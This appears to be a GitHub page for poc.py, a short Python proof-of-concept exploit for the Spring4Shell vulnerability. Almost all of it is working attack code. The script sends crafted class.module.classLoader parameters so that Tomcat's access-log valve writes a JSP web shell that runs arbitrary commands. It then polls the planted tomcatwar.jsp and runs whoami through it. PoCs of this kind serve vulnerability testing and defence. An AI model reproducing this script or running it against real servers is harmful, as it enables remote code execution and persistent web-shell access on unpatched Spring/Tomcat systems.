-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathpoc.py
46 lines (39 loc) · 1.61 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import time
import requests
payload = {
"class.module.classLoader.resources.context.parent.pipeline.first.pattern": '%{c2}i { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i',
"class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
"class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
"class.module.classLoader.resources.context.parent.pipeline.first.prefix": "tomcatwar",
"class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",
}
if __name__ == "__main__":
go = requests.post(
"http://localhost:8080/demo/index",
headers={"suffix": "%>//", "c2": "<%"},
data=payload,
timeout=15,
allow_redirects=False,
verify=False,
)
print("deploy", go)
for i in range(60):
shellgo = requests.get(
"http://localhost:8080/tomcatwar.jsp",
timeout=15,
allow_redirects=False,
verify=False,
)
print("webshell", shellgo)
if shellgo.status_code == 500:
print("webshell", "http://localhost:8080/tomcatwar.jsp?cmd=whoami")
print(
requests.get(
"http://localhost:8080/tomcatwar.jsp?cmd=whoami",
timeout=15,
allow_redirects=False,
verify=False,
).text[:20]
)
break
time.sleep(1)